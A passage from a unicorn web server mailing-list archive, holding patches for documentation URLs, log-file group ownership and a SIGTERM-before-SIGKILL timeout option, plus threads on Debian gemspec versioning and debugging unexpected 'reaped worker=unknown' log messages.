+      return Unicorn.builder('config.ru', op).call(x, server)
 
     # Load Rails and (possibly) the private version of Rack it bundles.
     begin

If that doesn't fix it, keep reading.

If after_fork is referencing LoggerSwitcher, and preload_app is not set,
then I think the failure should be expected, as in that case after_fork
is called before build_app!.  That would not explain a regression,
though, as that behavior should have been true in 5.4.1.

Does the problem go away if you switch after_fork to after_worker_ready?
Is preload_app set to true?

Thanks,
Jeremy

^ permalink raw reply related	[relevance 2%]

* Re: Bug#918916: Unicorn not reporting proper version for gemfile?
  2019-01-12  9:42  3%     ` Hleb Valoshka
@ 2019-01-12 10:04  0%       ` Dominik George
  0 siblings, 0 replies; 200+ results
From: Dominik George @ 2019-01-12 10:04 UTC (permalink / raw)
  To: Hleb Valoshka, 918916; +Cc: Justin Hallett, unicorn-public

>I've checked debian's git, this patch was introduced when
>ENV["VERSION"] was required to use the gemspec. Now as the upstream
>gemspec provides the same it's not required.
>
>The problem is not in Unicorn. The problem is in gem2deb which
>generated incorrect unicorn-0.gemspec for the package.

OK... But, why was it fixed when I rebuilt with the patch?

-nik

^ permalink raw reply	[relevance 0%]

* Re: Bug#918916: Unicorn not reporting proper version for gemfile?
  @ 2019-01-12  9:42  3%     ` Hleb Valoshka
  2019-01-12 10:04  0%       ` Dominik George
  0 siblings, 1 reply; 200+ results
From: Hleb Valoshka @ 2019-01-12  9:42 UTC (permalink / raw)
  To: 918916; +Cc: Dominik George, Justin Hallett, unicorn-public

On 1/10/19, Eric Wong <e@80x24.org> wrote:
>> +-  s.version = (ENV['VERSION'] || '5.4.1').dup
>> ++  s.version = '5.4.1'
>
> Why is ignoring ENV['VERSION'] necessary for the Debian build?
> I can probably remove that check if desired from the upstream
> package before the 5.5.0 release.

I've checked debian's git, this patch was introduced when
ENV["VERSION"] was required to use the gemspec. Now as the upstream
gemspec provides the same it's not required.

The problem is not in Unicorn. The problem is in gem2deb which
generated incorrect unicorn-0.gemspec for the package.

^ permalink raw reply	[relevance 3%]

* [PATCH] doc/ISSUES: add links to git clone-able mail archives of our dependencies
@ 2018-12-13  1:07  6% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2018-12-13  1:07 UTC (permalink / raw)
  To: unicorn-public

Archives are crucial to preserving history and knowledge in Free
Software projects, so promote them for projects we depend on.

Naq lrf, gur nepuviny fbsgjner qrirybcrq sbe nepuvivat gur
havpbea znvyvat yvfg unf ybat fhecnffrq gur hfrshyarff bs
havpbea vgfrys :C
---
 ISSUES | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/ISSUES b/ISSUES
index 610f011..c04ff54 100644
--- a/ISSUES
+++ b/ISSUES
@@ -39,6 +39,7 @@ https://bugs.ruby-lang.org/ and discuss+fix them on the ruby-core
 list at mailto:ruby-core@ruby-lang.org
 Subscription to post is required to ruby-core, unfortunately:
 mailto:ruby-core-request@ruby-lang.org?subject=subscribe
+Unofficial archives are available at: https://public-inbox.org/ruby-core/
 
 For uncommon bugs in Rack, we may forward bugs to
 mailto:rack-devel@googlegroups.com and discuss there.
@@ -46,6 +47,7 @@ Subscription (without any web UI or Google account) is possible via:
 mailto:rack-devel+subscribe@googlegroups.com
 Note: not everyone can use the proprietary bug tracker used by Rack,
 but their mailing list remains operational.
+Unofficial archives are available at: https://public-inbox.org/rack-devel/
 
 Uncommon bugs we encounter in the Linux kernel should be Cc:-ed to the
 Linux kernel mailing list (LKML) at mailto:linux-kernel@vger.kernel.org
@@ -54,11 +56,12 @@ and subsystem maintainers such as mailto:netdev@vger.kernel.org
 involved with any problematic commits (including those in the
 Signed-off-by: and other trailer lines).  No subscription is necessary,
 and the our mailing list follows the same conventions as LKML for
-interopability.  There is a kernel.org Bugzilla instance, but it is
-ignored by most developers.
+interopability. Archives are available at https://lore.kernel.org/lkml/
+There is a kernel.org Bugzilla instance, but it is ignored by most.
 
 Likewise for any rare glibc bugs we might encounter, we should Cc:
 mailto:libc-alpha@sourceware.org
+Unofficial archives are available at: https://public-inbox.org/libc-alpha/
 Keep in mind glibc upstream does use Bugzilla for tracking bugs:
 https://sourceware.org/bugzilla/
 

^ permalink raw reply related	[relevance 6%]

* [PATCH] doc: update more URLs to use HTTPS and avoid redirects
@ 2018-11-07 23:38  2% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2018-11-07 23:38 UTC (permalink / raw)
  To: unicorn-public

Latency from redirects is painful, and HTTPS can protect privacy
in some cases.
---
 .olddoc.yml                       |  2 +-
 Application_Timeouts              |  8 ++++----
 Documentation/unicorn.1.txt       |  2 +-
 Documentation/unicorn_rails.1.txt |  2 +-
 LICENSE                           |  4 ++--
 Links                             | 12 ++++++------
 README                            |  8 ++++----
 Sandbox                           |  4 ++--
 examples/logrotate.conf           |  2 +-
 examples/nginx.conf               |  5 +++--
 lib/unicorn/configurator.rb       |  2 +-
 lib/unicorn/http_request.rb       |  2 +-
 lib/unicorn/http_server.rb        |  2 +-
 lib/unicorn/util.rb               |  2 +-
 t/README                          |  8 ++++----
 15 files changed, 33 insertions(+), 32 deletions(-)

diff --git a/.olddoc.yml b/.olddoc.yml
index cacc0ab..d2d340f 100644
--- a/.olddoc.yml
+++ b/.olddoc.yml
@@ -1,6 +1,6 @@
 ---
 cgit_url: https://bogomips.org/unicorn.git
-git_url: git://bogomips.org/unicorn.git
+git_url: https://bogomips.org/unicorn.git
 rdoc_url: https://bogomips.org/unicorn/
 ml_url: https://bogomips.org/unicorn-public/
 merge_html:
diff --git a/Application_Timeouts b/Application_Timeouts
index 561a1cc..4dcd954 100644
--- a/Application_Timeouts
+++ b/Application_Timeouts
@@ -23,10 +23,10 @@ Most database adapters allow configurable timeouts.
 Net::HTTP and Net::SMTP in the Ruby standard library allow
 configurable timeouts.
 
-Even for things as fast as {memcached}[http://memcached.org/],
-{dalli}[http://rubygems.org/gems/dalli],
-{memcached}[http://rubygems.org/gems/memcached] and
-{memcache-client}[http://rubygems.org/gems/memcache-client] RubyGems all
+Even for things as fast as {memcached}[https://memcached.org/],
+{dalli}[https://rubygems.org/gems/dalli],
+{memcached}[https://rubygems.org/gems/memcached] and
+{memcache-client}[https://rubygems.org/gems/memcache-client] RubyGems all
 offer configurable timeouts.
 
 Consult the relevant documentation for the libraries you use on
diff --git a/Documentation/unicorn.1.txt b/Documentation/unicorn.1.txt
index e692078..da7281d 100644
--- a/Documentation/unicorn.1.txt
+++ b/Documentation/unicorn.1.txt
@@ -182,6 +182,6 @@ the unicorn config file.
 * [Rackup HowTo][3]
 
 [1]: https://bogomips.org/unicorn/
-[2]: http://www.rubydoc.info/github/rack/rack/
+[2]: https://www.rubydoc.info/github/rack/rack/
 [3]: https://github.com/rack/rack/wiki/tutorial-rackup-howto
 [4]: https://bogomips.org/unicorn/SIGNALS.html
diff --git a/Documentation/unicorn_rails.1.txt b/Documentation/unicorn_rails.1.txt
index 088e2ff..fb0e60f 100644
--- a/Documentation/unicorn_rails.1.txt
+++ b/Documentation/unicorn_rails.1.txt
@@ -170,6 +170,6 @@ used by Unicorn.
 * [Rackup HowTo][3]
 
 [1]: https://bogomips.org/unicorn/
-[2]: http://www.rubydoc.info/github/rack/rack/
+[2]: https://www.rubydoc.info/github/rack/rack/
 [3]: https://github.com/rack/rack/wiki/tutorial-rackup-howto
 [4]: https://bogomips.org/unicorn/SIGNALS.html
diff --git a/LICENSE b/LICENSE
index 5b6458e..e986865 100644
--- a/LICENSE
+++ b/LICENSE
@@ -8,8 +8,8 @@ any later version.  We currently prefer the GPLv3 or later for
 derivative works, but the GPLv2 is fine.
 
 The complete texts of the GPLv2 and GPLv3 are below:
-GPLv2 - http://www.gnu.org/licenses/gpl-2.0.txt
-GPLv3 - http://www.gnu.org/licenses/gpl-3.0.txt
+GPLv2 - https://www.gnu.org/licenses/gpl-2.0.txt
+GPLv3 - https://www.gnu.org/licenses/gpl-3.0.txt
 
 You may (against our _preference_) also use the Ruby 1.8 license terms
 which we inherited from the original Mongrel project when we forked it:
diff --git a/Links b/Links
index 475a6c0..baba9c7 100644
--- a/Links
+++ b/Links
@@ -10,7 +10,7 @@ The unicorn project is not responsible for the content in these links.
 Furthermore, the unicorn project has never, does not and will never endorse:
 
 * any for-profit entities or services
-* any non-{Free Software}[http://www.gnu.org/philosophy/free-sw.html]
+* any non-{Free Software}[https://www.gnu.org/philosophy/free-sw.html]
 
 The existence of these links does not imply endorsement of any entities
 or services behind them.
@@ -31,25 +31,25 @@ or services behind them.
 
 === unicorn is written to work with
 
-* {Rack}[http://rack.github.io/] - a minimal interface between webservers
+* {Rack}[https://rack.github.io/] - a minimal interface between webservers
   supporting Ruby and Ruby frameworks
 
 * {Ruby}[https://www.ruby-lang.org/en/] - the programming language of
   Rack and unicorn
 
-* {nginx}[http://nginx.org/] (Free versions) -
+* {nginx}[https://nginx.org/] (Free versions) -
   the reverse proxy for use with unicorn
 
 === Derivatives
 
-* {Green Unicorn}[http://gunicorn.org/] - a Python version of unicorn
+* {Green Unicorn}[https://gunicorn.org/] - a Python version of unicorn
 
-* {Starman}[http://search.cpan.org/dist/Starman/] - Plack/PSGI version
+* {Starman}[https://metacpan.org/release/Starman/] - Plack/PSGI version
   of unicorn
 
 === Prior Work
 
-* {Mongrel}[http://rubygems.org/gems/mongrel] - the awesome webserver
+* {Mongrel}[https://rubygems.org/gems/mongrel] - the awesome webserver
   unicorn is based on
 
 * {david}[https://bogomips.org/david.git] - a tool to explain why you need
diff --git a/README b/README
index 29e04b4..5e5ccf7 100644
--- a/README
+++ b/README
@@ -10,7 +10,7 @@ both the the request and response in between unicorn and slow clients.
 
 * Designed for Rack, Unix, fast clients, and ease-of-debugging.  We
   cut out everything that is better supported by the operating system,
-  {nginx}[http://nginx.org/] or {Rack}[http://rack.github.io/].
+  {nginx}[https://nginx.org/] or {Rack}[https://rack.github.io/].
 
 * Compatible with Ruby 1.9.3 and later.
   unicorn 4.x remains supported for Ruby 1.8 users.
@@ -77,13 +77,13 @@ You may install it via RubyGems on RubyGems.org:
 You can get the latest source via git from the following locations
 (these versions may not be stable):
 
-  git://bogomips.org/unicorn.git
-  git://repo.or.cz/unicorn.git (mirror)
+  https://bogomips.org/unicorn.git
+  https://repo.or.cz/unicorn.git (mirror)
 
 You may browse the code from the web:
 
 * https://bogomips.org/unicorn.git
-* http://repo.or.cz/w/unicorn.git (gitweb)
+* https://repo.or.cz/w/unicorn.git (gitweb)
 
 See the HACKING guide on how to contribute and build prerelease gems
 from git.
diff --git a/Sandbox b/Sandbox
index e10b36d..d0f915e 100644
--- a/Sandbox
+++ b/Sandbox
@@ -3,7 +3,7 @@
 Since unicorn includes executables and is usually used to start a Ruby
 process, there are certain caveats to using it with tools that sandbox
 RubyGems installations such as
-{Bundler}[http://bundler.io/] or
+{Bundler}[https://bundler.io/] or
 {Isolate}[https://github.com/jbarnette/isolate].
 
 == General deployment
@@ -66,7 +66,7 @@ before_exec hook as illustrated by https://gist.github.com/534668
 Ruby 2.0.0 enforces FD_CLOEXEC on file descriptors by default.  unicorn
 has been prepared for this behavior since unicorn 4.1.0, and bundler
 needs the "--keep-file-descriptors" option for "bundle exec":
-http://bundler.io/man/bundle-exec.1.html
+https://bundler.io/man/bundle-exec.1.html
 
 == Isolate
 
diff --git a/examples/logrotate.conf b/examples/logrotate.conf
index 437f6c6..77a01b5 100644
--- a/examples/logrotate.conf
+++ b/examples/logrotate.conf
@@ -2,7 +2,7 @@
 # /etc/logrotate.d/unicorn_app on my Debian systems
 #
 # See the logrotate(8) manpage for more information:
-#    http://linux.die.net/man/8/logrotate
+#    https://linux.die.net/man/8/logrotate
 #
 # public logrotate-related discussion in our archives:
 #    https://bogomips.org/unicorn-public/?q=logrotate
diff --git a/examples/nginx.conf b/examples/nginx.conf
index e25712f..b6b69c1 100644
--- a/examples/nginx.conf
+++ b/examples/nginx.conf
@@ -56,7 +56,8 @@ http {
   # to configure it all in one place here for static files and also
   # to disable gzip for clients who don't get gzip/deflate right.
   # There are other gzip settings that may be needed used to deal with
-  # bad clients out there, see http://wiki.nginx.org/NginxHttpGzipModule
+  # bad clients out there, see
+  # https://nginx.org/en/docs/http/ngx_http_gzip_module.html
   gzip on;
   gzip_http_version 1.0;
   gzip_proxied any;
@@ -117,7 +118,7 @@ http {
 
     location @app {
       # an HTTP header important enough to have its own Wikipedia entry:
-      #   http://en.wikipedia.org/wiki/X-Forwarded-For
+      #   https://en.wikipedia.org/wiki/X-Forwarded-For
       proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
 
       # enable this if you forward HTTPS traffic to unicorn,
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index d426edf..e8b76f5 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -238,7 +238,7 @@ def before_exec(*args, &block)
   #      server 192.168.0.9:8080 fail_timeout=0;
   #    }
   #
-  # See http://nginx.org/en/docs/http/ngx_http_upstream_module.html
+  # See https://nginx.org/en/docs/http/ngx_http_upstream_module.html
   # for more details on nginx upstream configuration.
   def timeout(seconds)
     set_int(:timeout, seconds, 3)
diff --git a/lib/unicorn/http_request.rb b/lib/unicorn/http_request.rb
index 8bb884b..bcc1f2d 100644
--- a/lib/unicorn/http_request.rb
+++ b/lib/unicorn/http_request.rb
@@ -65,7 +65,7 @@ def read(socket)
     clear
     e = env
 
-    # From http://www.ietf.org/rfc/rfc3875:
+    # From https://www.ietf.org/rfc/rfc3875:
     # "Script authors should be aware that the REMOTE_ADDR and
     #  REMOTE_HOST meta-variables (see sections 4.1.8 and 4.1.9)
     #  may not identify the ultimate source of the request.  They
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 62f6171..5334fa0 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -84,7 +84,7 @@ def initialize(app, options = {})
     # * The master process never closes or reinitializes this once
     # initialized.  Signal handlers in the master process will write to
     # it to wake up the master from IO.select in exactly the same manner
-    # djb describes in http://cr.yp.to/docs/selfpipe.html
+    # djb describes in https://cr.yp.to/docs/selfpipe.html
     #
     # * The workers immediately close the pipe they inherit.  See the
     # Unicorn::Worker class for the pipe workers use.
diff --git a/lib/unicorn/util.rb b/lib/unicorn/util.rb
index 501930c..b826de4 100644
--- a/lib/unicorn/util.rb
+++ b/lib/unicorn/util.rb
@@ -64,7 +64,7 @@ def self.reopen_logs
           fp.reopen(fp.path, "a")
         else
           # We should not need this workaround, Ruby can be fixed:
-          #    http://bugs.ruby-lang.org/issues/9036
+          #    https://bugs.ruby-lang.org/issues/9036
           # MRI will not call call fclose(3) or freopen(3) here
           # since there's no associated std{in,out,err} FILE * pointer
           # This should atomically use dup3(2) (or dup2(2)) syscall
diff --git a/t/README b/t/README
index bcaf3ce..0d9b697 100644
--- a/t/README
+++ b/t/README
@@ -10,17 +10,17 @@ comfortable writing integration tests with.
 
 == Requirements
 
-* {Ruby 1.9.3+}[https://www.ruby-lang.org/] (duh!)
-* {GNU make}[http://www.gnu.org/software/make/]
+* {Ruby 1.9.3+}[https://www.ruby-lang.org/en/] (duh!)
+* {GNU make}[https://www.gnu.org/software/make/]
 * {socat}[http://www.dest-unreach.org/socat/]
-* {curl}[http://curl.haxx.se/]
+* {curl}[https://curl.haxx.se/]
 * standard UNIX shell utilities (Bourne sh, awk, sed, grep, ...)
 
 We do not use bashisms or any non-portable, non-POSIX constructs
 in our shell code.  We use the "pipefail" option if available and
 mainly test with {ksh}[http://kornshell.com/], but occasionally
 with {dash}[http://gondor.apana.org.au/~herbert/dash/] and
-{bash}[http://www.gnu.org/software/bash/], too.
+{bash}[https://www.gnu.org/software/bash/], too.
 
 == Running Tests
 
-- 
EW


^ permalink raw reply related	[relevance 2%]

* Re: Make Worker#user support different process primary group and log file group
  @ 2018-09-13 22:53  3% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2018-09-13 22:53 UTC (permalink / raw)
  To: Jeremy Evans; +Cc: unicorn-public

Jeremy Evans <code@jeremyevans.net> wrote:
> This patch allows Worker#user to accept the group argument as an array
> of two strings, the first string being the process primary group, and
> the second string being the group that owns the log files.  This can
> help when you have a large number of applications that use unique
> primary groups, and want to have a user with the ability to read the log
> files for any of the applications, especially if you are on an operating
> system that only supports a small number of groups per user.

Fwiw, I don't understand why there's a blurb here for an
isolated patch when your commit message below is is sufficient :)

Along the same lines, "--cover-letter" in git-format-patch(1)
isn't necessary for single patches, either, but they help with a
multi-patch series.

> Subject: [PATCH] Make Worker#user support different process primary group and
>  log file group
> 
> Previously, Unicorn always used the process's primary group as the
> the group of the log file.  However, there are reasons to use a
> separate group for the log files, such as when you have many
> applications where each application uses it's own user and primary
> group, but you want to be able to have a user read the log files
> for all applications.  Some operating systems have a fairly small
> limit on the number of groups per user, and it may not be feasible
> to have a user be in the primary group for all applications.
> a primary group

Anyways, this featureseems acceptable.  Pushed to master as
47fddb53aa0b7763f353ba515cf3fb5b2059f4f7

Thanks

^ permalink raw reply	[relevance 3%]

* [PATCH] Send SIGTERM before SIGKILL on timeout
@ 2018-02-24  8:48  4% Fumiaki MATSUSHIMA
  0 siblings, 0 replies; 200+ results
From: Fumiaki MATSUSHIMA @ 2018-02-24  8:48 UTC (permalink / raw)
  To: unicorn-public; +Cc: mtsmfm

To output log / send error to error tracking service,
we need to receive a signal other than SIGKILL first.
---
Hi Unicorn team,

I'm not sure this change is accetable though,
I can find some articles and patches to prevent SIGKILL
on timeout.
I think it's great if this feature is supported by unicorn itself.

Could you give me your opinion?

 lib/unicorn/configurator.rb | 16 +++++++++++++++-
 lib/unicorn/http_server.rb  | 27 +++++++++++++++++----------
 test/unit/test_signals.rb   | 43 +++++++++++++++++++++++++++++++++++++++++++
 3 files changed, 75 insertions(+), 11 deletions(-)

diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index f34d38b..f854032 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -30,6 +30,7 @@ class Unicorn::Configurator
   # Default settings for Unicorn
   DEFAULTS = {
     :timeout => 60,
+    :sigterm_timeout => 60,
     :logger => Logger.new($stderr),
     :worker_processes => 1,
     :after_fork => lambda { |server, worker|
@@ -237,11 +238,24 @@ def before_exec(*args, &block)
   #
   # See http://nginx.org/en/docs/http/ngx_http_upstream_module.html
   # for more details on nginx upstream configuration.
-  def timeout(seconds)
+  #
+  # The following options may be specified:
+  #
+  # [:sigterm => seconds]
+  #
+  #   Send SIGTERM when worker process is timed out.
+  #   Workers can't output backtrace if it's received SIGKILL
+  #   so it's useful to send SIGTERM before SIGKILL to find slow codes.
+  #   If you specify sigterm greater than or equal to timeout, workers will be always killed by SIGKILL.
+  #
+  #   Default: same seconds as the timeout
+  def timeout(seconds, options = {})
     set_int(:timeout, seconds, 3)
     # POSIX says 31 days is the smallest allowed maximum timeout for select()
     max = 30 * 60 * 60 * 24
     set[:timeout] = seconds > max ? max : seconds
+
+    set_int(:sigterm_timeout, options[:sigterm] || set[:timeout], 3)
   end

   # Whether to exec in each worker process after forking.  This changes the
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 8674729..da7c420 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -11,7 +11,7 @@
 # See Unicorn::Configurator for information on how to configure unicorn.
 class Unicorn::HttpServer
   # :stopdoc:
-  attr_accessor :app, :timeout, :worker_processes,
+  attr_accessor :app, :timeout, :sigterm_timeout, :worker_processes,
                 :before_fork, :after_fork, :before_exec,
                 :listener_opts, :preload_app,
                 :orig_app, :config, :ready_pipe, :user
@@ -284,10 +284,10 @@ def join
       when nil
         # avoid murdering workers after our master process (or the
         # machine) comes out of suspend/hibernation
-        if (last_check + @timeout) >= (last_check = time_now)
+        if (last_check + @sigterm_timeout) >= (last_check = time_now)
           sleep_time = murder_lazy_workers
         else
-          sleep_time = @timeout/2.0 + 1
+          sleep_time = @sigterm_timeout/2.0 + 1
           @logger.debug("waiting #{sleep_time}s after suspend/hibernation")
         end
         maintain_worker_count if respawn
@@ -495,21 +495,29 @@ def close_sockets_on_exec(sockets)

   # forcibly terminate all workers that haven't checked in in timeout seconds.  The timeout is implemented using an unlinked File
   def murder_lazy_workers
-    next_sleep = @timeout - 1
+    next_sleep = @sigterm_timeout - 1
     now = time_now.to_i
     @workers.dup.each_pair do |wpid, worker|
       tick = worker.tick
       0 == tick and next # skip workers that haven't processed any clients
       diff = now - tick
-      tmp = @timeout - diff
+      tmp = @sigterm_timeout - diff
+
       if tmp >= 0
         next_sleep > tmp and next_sleep = tmp
         next
       end
       next_sleep = 0
-      logger.error "worker=#{worker.nr} PID:#{wpid} timeout " \
-                   "(#{diff}s > #{@timeout}s), killing"
-      kill_worker(:KILL, wpid) # take no prisoners for timeout violations
+
+      if diff > @timeout
+        logger.error "worker=#{worker.nr} PID:#{wpid} timeout " \
+        "(#{diff}s > #{@timeout}s), killing with SIGKILL"
+        kill_worker(:KILL, wpid) # take no prisoners for timeout violations
+      elsif diff > @sigterm_timeout
+        logger.error "worker=#{worker.nr} PID:#{wpid} timeout " \
+        "(#{diff}s > #{@sigterm_timeout}s), killing with SIGTERM"
+        kill_worker(:TERM, wpid) # take no prisoners for timeout violations
+      end
     end
     next_sleep <= 0 ? 1 : next_sleep
   end
@@ -655,7 +663,6 @@ def init_worker_process(worker)
     LISTENERS.each { |sock| sock.close_on_exec = true }

     worker.user(*user) if user.kind_of?(Array) && ! worker.switched
-    self.timeout /= 2.0 # halve it for select()
     @config = nil
     build_app! unless preload_app
     @after_fork = @listener_opts = @orig_app = nil
@@ -718,7 +725,7 @@ def worker_loop(worker)

       # timeout used so we can detect parent death:
       worker.tick = time_now.to_i
-      ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
+      ret = IO.select(readers, nil, nil, @sigterm_timeout / 2.0) and ready = ret[0]
     rescue => e
       redo if nr < 0 && readers[0]
       Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
diff --git a/test/unit/test_signals.rb b/test/unit/test_signals.rb
index 4592819..dc74a9b 100644
--- a/test/unit/test_signals.rb
+++ b/test/unit/test_signals.rb
@@ -118,6 +118,49 @@ def test_timeout_slow_response
       Process.kill(:TERM, pid) rescue nil
   end

+  def test_timeout_slow_response_with_sigterm
+    pid = fork {
+      app = lambda { |env|
+        Signal.trap(:TERM) {
+          puts 'Killed by SIGTERM'
+
+          exit
+        }
+
+        sleep
+      }
+      redirect_test_io {
+        Tempfile.open(['config', '.rb']) { |file|
+          file.write(<<-EOS)
+            timeout 100, sigterm: 3
+          EOS
+
+          file.flush
+
+          HttpServer.new(app, @server_opts.merge(config_file: file.path)).start.join
+        }
+      }
+    }
+    t0 = Time.now
+    wait_workers_ready("test_stderr.#{pid}.log", 1)
+    sock = TCPSocket.new('127.0.0.1', @port)
+    sock.syswrite("GET / HTTP/1.0\r\n\r\n")
+
+    buf = nil
+    assert_raises(EOFError,Errno::ECONNRESET,Errno::EPIPE,Errno::EINVAL,
+                  Errno::EBADF) do
+      buf = sock.sysread(4096)
+    end
+    diff = Time.now - t0
+    assert_nil buf
+    assert diff > 1.0, "diff was #{diff.inspect}"
+    assert diff < 60.0
+    assert_equal "Killed by SIGTERM\n", File.read("test_stdout.#{pid}.log")
+    wait_workers_ready("test_stderr.#{pid}.log", 1)
+    ensure
+      Process.kill(:TERM, pid) rescue nil
+  end
+
   def test_response_write
     app = lambda { |env|
       [ 200, { 'Content-Type' => 'text/plain', 'X-Pid' => Process.pid.to_s },
--
2.14.1


^ permalink raw reply related	[relevance 4%]

* Re: Reaping process with unknown worker
  2017-10-19 19:23  3%       ` Alberto De Gaspari
@ 2017-10-19 19:37  0%         ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2017-10-19 19:37 UTC (permalink / raw)
  To: Alberto De Gaspari; +Cc: unicorn-public

Alberto De Gaspari <a.degaspari@18months.it> wrote:
> >> with a line like this in the log:
> >> INFO -- : reaped #<Process::Status: pid 16101 exit 0> worker=unknown
> >> if i run
> >> # ps axf |grep 16101
> >> i only get the ps line:
> >> 10277 pts/4    S+     0:00          \_ grep 16101
> >>
> >> consider that i have loads of this line in the log, like at least 1
> >> every minute.
> >>
> >> what could cause those reaps?
> > 
> > Reaping happens after a process exits, so it won't show up
> > in "ps" once it's reaped.
> > 
> ok, got it:
> but if at t0 i run ps axf and save the result, when at t1 i find one of
> the lines in the stderr_log and try to grep the stated pid in the saved
> result of t0 i don't find anything.

I guess this is because the process is too short-lived.  Can you
audit your code for when you spawn applications and check that?

Actually, what is curious is your master process is reaping
these processes (not workers reaping); yet your workers are not
dying and getting reaped.

Are you using preload_app?

If so, do you spawn any background processes at load time?
Or are there any background threads in the master process?

Does the problem go away if you disable preload_app?

Because, in normal applications, workers may spawn background
processes but its rare for the master to spawn anything but
workers themselves.

> how can i detect what it's reaping? do you consider this a normal
> behavior for a rails app which actually only receives simple get
> requests and save the result in a pg db?(that's what the small instance
> of unicorn does, the other is more complex, but shows the same amount
> and type of info messages in errors)

AFAIK, you cannot detect what it's reaping portably...

You can try the following hack to look for defunct (zombie)
processes before unicorn calls waitpid2.  However, keep in mind
it is subject to race conditions so not 100% reliable:

diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index f33aa25..f57271e 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -396,6 +396,7 @@ def awaken_master
   # reaps all unreaped workers
   def reap_all_workers
     begin
+      system('ps | grep defunct')
       wpid, status = Process.waitpid2(-1, Process::WNOHANG)
       wpid or return
       if @reexec_pid == wpid



One other thing you try do (on Linux) is strace the master:

	strace -p $PID_OF_MASTER -f -e execve,clone

And see what the master is spawning.  I suppose other OS has
similar functions (truss/ktruss/...)

^ permalink raw reply related	[relevance 0%]

* Re: Reaping process with unknown worker
  @ 2017-10-19 19:23  3%       ` Alberto De Gaspari
  2017-10-19 19:37  0%         ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Alberto De Gaspari @ 2017-10-19 19:23 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

>> with a line like this in the log:
>> INFO -- : reaped #<Process::Status: pid 16101 exit 0> worker=unknown
>> if i run
>> # ps axf |grep 16101
>> i only get the ps line:
>> 10277 pts/4    S+     0:00          \_ grep 16101
>>
>> consider that i have loads of this line in the log, like at least 1
>> every minute.
>>
>> what could cause those reaps?
> 
> Reaping happens after a process exits, so it won't show up
> in "ps" once it's reaped.
> 
ok, got it:
but if at t0 i run ps axf and save the result, when at t1 i find one of
the lines in the stderr_log and try to grep the stated pid in the saved
result of t0 i don't find anything.
how can i detect what it's reaping? do you consider this a normal
behavior for a rails app which actually only receives simple get
requests and save the result in a pg db?(that's what the small instance
of unicorn does, the other is more complex, but shows the same amount
and type of info messages in errors)

-- 
Cordiali saluti
Alberto De Gaspari
CTO & Software Engineer

18Months S.r.l
Via Copernico 38, Milano 20125, Italia
Tel:    +39 02.92852164
Fax:    +39 02.45075016
Mob:    +39 349.1624385
MeetMe: doodle.com/albertodega
Email:  a.degaspari@18months.it
web:    www.18months.it

^ permalink raw reply	[relevance 3%]

* Re: Reaping process with unknown worker
  2017-10-19 17:42  4% Reaping process with unknown worker Alberto De Gaspari
@ 2017-10-19 18:20  0% ` Eric Wong
    0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2017-10-19 18:20 UTC (permalink / raw)
  To: Alberto De Gaspari; +Cc: unicorn-public

Alberto De Gaspari <a.degaspari@18months.it> wrote:
> Hello everyone, maybe this is a noob question, but it seems strange from
> my point of view, so here i am:
> 
> I have 2 master processes running on the same server, pointing to the
> same rails application dir.
> I need 2 of them because i need some workers to be dedicated responding
> to requests coming from a specific socket(and i'm not sure this is the
> right way to do this)

That's fine.

> Both the standard_error_logs are full of messages like the following:
> 
> INFO -- : reaped #<Process::Status: pid 23835 exit 0> worker=unknown
> 
> is this a misconfiguration or something similar?

Does your application fork processes?  It may not be reaping
them.   Are your normal unicorn workers dying, too?

You can check the process tree or periodically run "ps" to see
what was running as the reaped pid before it died.

I use "ps axf" from the "procps" package on some Linux sytems;
or "pstree" if installed to see the process tree.

^ permalink raw reply	[relevance 0%]

* Reaping process with unknown worker
@ 2017-10-19 17:42  4% Alberto De Gaspari
  2017-10-19 18:20  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Alberto De Gaspari @ 2017-10-19 17:42 UTC (permalink / raw)
  To: unicorn-public

Hello everyone, maybe this is a noob question, but it seems strange from
my point of view, so here i am:

I have 2 master processes running on the same server, pointing to the
same rails application dir.
I need 2 of them because i need some workers to be dedicated responding
to requests coming from a specific socket(and i'm not sure this is the
right way to do this)

Both the standard_error_logs are full of messages like the following:

INFO -- : reaped #<Process::Status: pid 23835 exit 0> worker=unknown

is this a misconfiguration or something similar?
Thank you in advance!
alberto

^ permalink raw reply	[relevance 4%]

* Re: Random crash when sending USR2 + QUIT signals to Unicorn process
  2017-10-03 17:15  0%   ` Eric Wong
@ 2017-10-03 18:20  4%     ` Xuanzhong Wei
  0 siblings, 0 replies; 200+ results
From: Xuanzhong Wei @ 2017-10-03 18:20 UTC (permalink / raw)
  To: e; +Cc: azrlew, code, maillist, pere.joan, philip, unicorn-public

Thanks for quick response!

Here is the compiler version:
gcc version 4.4.7 20120313 (Red Hat 4.4.7-4) (GCC)

Furthermore, although I was not able to re-produce the issue with codes caused
the problem, I generated some core files of normal and abnormal masters and
workers.

Here is a glimpse of `ruby_current_vm.objspace.global_list`
compared with normal and abnormal masters with same codes.

// normal
(gdb)
$72 = (struct gc_list *) 0x7feb65625680
$73 = 5
---------------------------------------------
(gdb)
